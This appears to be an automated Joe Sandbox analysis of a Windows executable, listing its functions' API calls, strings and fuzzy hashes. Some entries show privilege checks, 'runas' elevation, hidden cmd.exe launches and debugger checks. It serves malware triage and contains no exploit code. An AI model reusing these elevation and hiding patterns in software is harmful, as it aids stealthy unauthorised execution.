                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00B26AC8
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B26AD5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B26AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCurrentHandleOpenToken
                                                                  • String ID: S-1-5-18
                                                                  • API String ID: 4052875653-4289277601
                                                                  • Opcode ID: 998f662e62146f375805576e8849cb12d3dcf2ae4e31eb6ddcfcd82243dbf4e8
                                                                  • Instruction ID: 60490bb44e7334bb95208a296624459a7a332d9c40f29bd31c40f6153385cfd1
                                                                  • Opcode Fuzzy Hash: 998f662e62146f375805576e8849cb12d3dcf2ae4e31eb6ddcfcd82243dbf4e8
                                                                  • Instruction Fuzzy Hash: D702E130901269DFDF14DFA4E9557AEBBF4EF05304F1486D8D80AAB291EB34AE05CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

APIs
• std::locale::_Init.LIBCPMT ref: 00B29763
  • Part of subcall function 00B30C94: __EH_prolog3.LIBCMT ref: 00B30C9B
  • Part of subcall function 00B30C94: std::_Lockit::_Lockit.LIBCPMT ref: 00B30CA6
  • Part of subcall function 00B30C94: std::locale::_Setgloballocale.LIBCPMT ref: 00B30CC1
  • Part of subcall function 00B30C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00B30D17
• std::_Lockit::_Lockit.LIBCPMT ref: 00B2978A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B297F0
• std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00B2984A
  • Part of subcall function 00B2F57A: __EH_prolog3.LIBCMT ref: 00B2F581
  • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F5C8
  • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F620
  • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F654
  • Part of subcall function 00B2F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B2F6A8
• LocalFree.KERNEL32(00000000,00000000,?,00B754B1,00000000), ref: 00B299BF
• __cftoe.LIBCMT ref: 00B29B0B
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
• String ID: bad locale name
• API String ID: 3103716676-1405518554
• Opcode ID: a3cac39a8a8b266966b548cb2ae7731e307bdb8e440ec5d3853fb3ee52506649
• Instruction ID: 6c61c655154048fb944be5066b4b65a4b2a5d4b2806162b7b9f9688a27f59109
• Opcode Fuzzy Hash: a3cac39a8a8b266966b548cb2ae7731e307bdb8e440ec5d3853fb3ee52506649
• Instruction Fuzzy Hash: 6AF1AD71D01258DFDB10CFA8D984BAEBBF1EF09304F2441A9E80DAB381E7759A44CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000008,?,823FDEC6,?,-00000010), ref: 00B257D0
• OpenProcessToken.ADVAPI32(00000000), ref: 00B257D7
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00B2580C
• CloseHandle.KERNEL32(?), ref: 00B25822
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: d7baa7ddb3bafbf9b9af5e013550fc5de76b022dfd5982142e49119d891a5c16
• Instruction ID: 6aee845d7df1e976429623b8817fb67e2851abf28ce018b80cc5d39be7e0fde5
• Opcode Fuzzy Hash: d7baa7ddb3bafbf9b9af5e013550fc5de76b022dfd5982142e49119d891a5c16
• Instruction Fuzzy Hash: EFF01D74188301ABEB109F20EC49BAA7BE8FB44704F508859FD84C21A0DBB9955CDB73
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCommandLineW.KERNEL32(823FDEC6,?,?,?,?,?,?,?,?,?,00B656D5,000000FF), ref: 00B2CDE8
  • Part of subcall function 00B21F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00B24251,823FDEC6,00000000,?,00000000,?,?,?,00B64400,000000FF,?), ref: 00B21F9D
• ExitProcess.KERNEL32 ref: 00B2CEB1
  • Part of subcall function 00B26600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B2667E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: AllocCommandCreateExitFileLineLocalProcess
• String ID: Full command line:
• API String ID: 1878577176-831861440
• Opcode ID: 5d717a639c54b468865b282b0501eab90a072e532089d244999364f75319c77d
• Instruction ID: cea823f08d3dc15e36daeb4f00ecc03a3d24bb9d85a2d54d6e43b945560b0176
• Opcode Fuzzy Hash: 5d717a639c54b468865b282b0501eab90a072e532089d244999364f75319c77d
• Instruction Fuzzy Hash: 7F212131910264ABCB15FB60EC42BEE77E1AF14740F104598F41AAB292EF786B08C7E1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25EB4
• GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25EBE
• GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00B25E18,823FDEC6,?), ref: 00B25F1A
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: InformationToken$ErrorLast
• String ID:
• API String ID: 2567405617-0
• Opcode ID: 767604aefca442bc2640a850f663760197d32149402f542376a4a9507d5e9fb7
• Instruction ID: 888d99a46b0bda7eebbaafcef9b2683138571500afed8343c94efdc07677ed30
• Opcode Fuzzy Hash: 767604aefca442bc2640a850f663760197d32149402f542376a4a9507d5e9fb7
• Instruction Fuzzy Hash: C7318F71A006159FDB20CF58DD45BAFBBF9FB44714F10456EE519E7280DBB569008BA0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 00B38635
• _Getvals.LIBCPMT ref: 00B38651
  • Part of subcall function 00B31D36: std::_Locinfo::_Getdays.LIBCPMT ref: 00B31D61
  • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D67
  • Part of subcall function 00B31D36: std::_Locinfo::_Getmonths.LIBCPMT ref: 00B31D7A
  • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D80
  • Part of subcall function 00B31D36: _Maklocstr.LIBCPMT ref: 00B31D8F
  • Part of subcall function 00B423F8: GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00B400E2,00000000,00000000,00000004,00B3ED14,00000000,00000004,00B3F127,00000000,00000000), ref: 00B42410
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Maklocstr$Locinfo::_std::_$GetdaysGetmonthsGetvalsH_prolog3InfoLocale
• String ID:
• API String ID: 1702918112-0
• Opcode ID: 1b52960a35d31e1fffb9a26ec5b7a97265cbdb6fc730b173d0ab44b652e4a2d6
• Instruction ID: ca788e670b749db5f2a38855da03bf66e0b70a95289b407e3ca1f79d53266943
• Opcode Fuzzy Hash: 1b52960a35d31e1fffb9a26ec5b7a97265cbdb6fc730b173d0ab44b652e4a2d6
• Instruction Fuzzy Hash: 5FE08CF0C003009FCB20EFB8840161EBAF0FF04700B008DAEA558D7201D7B48700AB50
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00B5596A,00000001,00000364,?,00000006,000000FF,?,00B46CE7,00000000,00B53841,00000000), ref: 00B570FC
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 07a2c646254de83255044a0a614818ff0d189400e31e200e4e394365ec88426e
• Instruction ID: ff6253fdee2c172de91dd24a12f7fb737a9ee7f66b378b560fcd2cca8ac3e6b3
• Opcode Fuzzy Hash: 07a2c646254de83255044a0a614818ff0d189400e31e200e4e394365ec88426e
• Instruction Fuzzy Hash: 0AF0B4313CC62067AB225A22AC02F5A77D9EF51773B1840E1BC14EB1D0CE60EC0886E1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RtlAllocateHeap.NTDLL(00000000,00000000,00B53841,?,00B5543A,?,00000000,?,00B46CE7,00000000,00B53841,00000000,?,?,?,00B5363B), ref: 00B55C0E
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 78b2e39736c2263c835a0162f428565810c4b08bfd21c4c2d5b68cc9d42a7bb6
• Instruction ID: 0e9a5d33f85fe8fb6b7d02200ea28f08ca0dbd8732d724b07a82e443064880b4
• Opcode Fuzzy Hash: 78b2e39736c2263c835a0162f428565810c4b08bfd21c4c2d5b68cc9d42a7bb6
• Instruction Fuzzy Hash: D4E0ED31204B21ABD6322A699D21B9A37CCEF113A3F0101E0FC96962E0CF60CC4886F9
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00B30DF9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B30E11
                                                                    • Part of subcall function 00B29730: std::locale::_Init.LIBCPMT ref: 00B29763
                                                                    • Part of subcall function 00B29730: std::_Lockit::_Lockit.LIBCPMT ref: 00B2978A
                                                                    • Part of subcall function 00B29730: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B297F0
                                                                  • LocalFree.KERNEL32(00000000,00000000,?,00B754B1,00000000), ref: 00B299BF
                                                                  • __cftoe.LIBCMT ref: 00B29B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_std::locale::_$FreeInitLocalLocimpLocimp::_Locinfo::_Locinfo_ctorLockitLockit::___cftoe
                                                                  • String ID:
                                                                  • API String ID: 810108568-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LocalAlloc.KERNELBASE(00000040,?,00B30E04,00000020,?,?,00B29942,00000000,823FDEC6,?,?,?,?,00B650DD,000000FF), ref: 00B26336
                                                                  Similarity
                                                                  • API ID: AllocLocal
                                                                  • String ID:
                                                                  • API String ID: 3494564517-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00B2549C
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00B2551D
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00B25601
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00B25637
                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B2567C
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B25685
                                                                  • AllowSetForegroundWindow.USER32(00000000), ref: 00B2568B
                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B256AB
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B256AE
                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00B256CA
                                                                  • EnumWindows.USER32(00B25830,?), ref: 00B256DF
                                                                  • BringWindowToTop.USER32(00000000), ref: 00B256F4
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00B25711
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00B2571B
                                                                  Similarity
                                                                  • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                  • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                  • API String ID: 697762045-2796270252
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00B2CBB6
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00B7E6D0,00000800), ref: 00B2CBD3
                                                                  Similarity
                                                                  • API ID: OpenQueryValue
                                                                  • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                  • API String ID: 4153817207-482544602
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00B542D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B5DEE5
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B542D9,?,?,?,00000055,?,-00000050,?,?), ref: 00B5DF10
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B5DFA4
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B5DFB2
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B5E073
                                                                  Similarity
                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                  • String ID: utf8
                                                                  • API String ID: 4147378913-905460609
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00B5E8D1,00000002,00000000,?,?,?,00B5E8D1,?,00000000), ref: 00B5E64C
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00B5E8D1,00000002,00000000,?,?,?,00B5E8D1,?,00000000), ref: 00B5E675
                                                                  • GetACP.KERNEL32(?,?,00B5E8D1,?,00000000), ref: 00B5E68A
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  Similarity
                                                                  • API ID: _swprintf$FreeLocal
                                                                  • String ID:
                                                                  • API String ID: 2429749586-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B5E894
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00B5E8DD
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00B5E8EC
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B5E934
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B5E953
                                                                  Similarity
                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                  • String ID:
                                                                  • API String ID: 415426439-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B433B4
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00B43480
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B434A0
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00B434AA
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: 13cd6717b269352986f107f8b3dd1341d2710f158d4bd7b7e05981cf7c02abf5
                                                                  • Instruction ID: 11cbaddd33998cdb1279d414a49c32a18a04c5cd2d02c88fa64a5fd9be39dfd8
                                                                  • Opcode Fuzzy Hash: 13cd6717b269352986f107f8b3dd1341d2710f158d4bd7b7e05981cf7c02abf5
                                                                  • Instruction Fuzzy Hash: EC314975D452189BDF10EFA0D989BCCBBF8AF08704F1040EAE50CAB290EB759B859F44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B2C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,823FDEC6,?,00B63D30,000000FF), ref: 00B2C657
                                                                    • Part of subcall function 00B2C630: GetLastError.KERNEL32(?,00000000,00000000,823FDEC6,?,00B63D30,000000FF), ref: 00B2C661
                                                                  • IsDebuggerPresent.KERNEL32(?,?,00B78AF0), ref: 00B2D0D8
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B78AF0), ref: 00B2D0E7
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B2D0E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 3511171328-631824599
                                                                  • Opcode ID: 281e2ee71b3424083d6082044a1d6be1ef748fb31d338298ddbbb0e9b8bc06ca
                                                                  • Instruction ID: ec54656e9dfe92c1d46d35ebccf7d3be00980df13ce8d6233867bc5f6114b929
                                                                  • Opcode Fuzzy Hash: 281e2ee71b3424083d6082044a1d6be1ef748fb31d338298ddbbb0e9b8bc06ca
                                                                  • Instruction Fuzzy Hash: 0BE06D702047618FE360AF28F418B477AE0AF15708F0088DDE459D32A0DFB9D4898BA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E28B
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E2D5
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B5E39B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 661929714-0
                                                                  • Opcode ID: 1d6187ca426f47199ff1a484226a1f59bd393a5956546445f3be718f71f9d6b4
                                                                  • Instruction ID: dc2b222ab034e9080c92417f434b1dc79164ddbd399ef33ccd3c92fe1f26f6d1
                                                                  • Opcode Fuzzy Hash: 1d6187ca426f47199ff1a484226a1f59bd393a5956546445f3be718f71f9d6b4
                                                                  • Instruction Fuzzy Hash: 536180715402079BEB2D9F24CC82BAA77E8EF18302F1041F9ED25D7285EB74DA89DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B46F13
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B46F1D
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B46F2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 616dbfac943d6275678d34f454b7d4ac78280ee0d2678292efa818f69c02ed5d
                                                                  • Instruction ID: a68a21b6fb7e5fa9572e06962d3d779a9886aa3f73f5c267ab0103f93e56eeca
                                                                  • Opcode Fuzzy Hash: 616dbfac943d6275678d34f454b7d4ac78280ee0d2678292efa818f69c02ed5d
                                                                  • Instruction Fuzzy Hash: 3D31C374901228ABCB21DF64D9897CDBBF8BF18310F5041EAE51CA7290EB749F859F45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadResource.KERNEL32(00000000,00000000,823FDEC6,00000001,00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?), ref: 00B245DB
                                                                  • LockResource.KERNEL32(00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?,?,?,?,00B23778), ref: 00B245E6
                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00B64460,000000FF,?,00B2474D,00B23778,?,00000000,00000000,?,?,?), ref: 00B245F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                   • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
